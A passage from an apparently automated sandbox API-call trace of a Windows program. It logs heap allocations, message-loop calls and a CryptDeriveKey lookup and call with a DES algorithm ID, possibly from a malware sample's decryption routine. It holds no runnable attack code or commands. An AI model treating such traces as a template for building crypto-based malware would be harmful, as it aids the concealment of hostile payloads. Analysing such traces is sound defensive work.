HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.772] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51be0 [0266.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.772] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51d48 [0266.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51d48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0266.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.777] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0266.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.778] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87290, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa870d0) returned 1 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0266.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0266.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.781] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0266.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0266.781] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0266.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0266.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.788] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 1 [0266.788] TranslateMessage (lpMsg=0x8cef40) returned 0 [0266.788] DispatchMessageW (lpMsg=0x8cef40) returned 0x0 [0266.788] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0266.788] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0266.788] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0266.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, 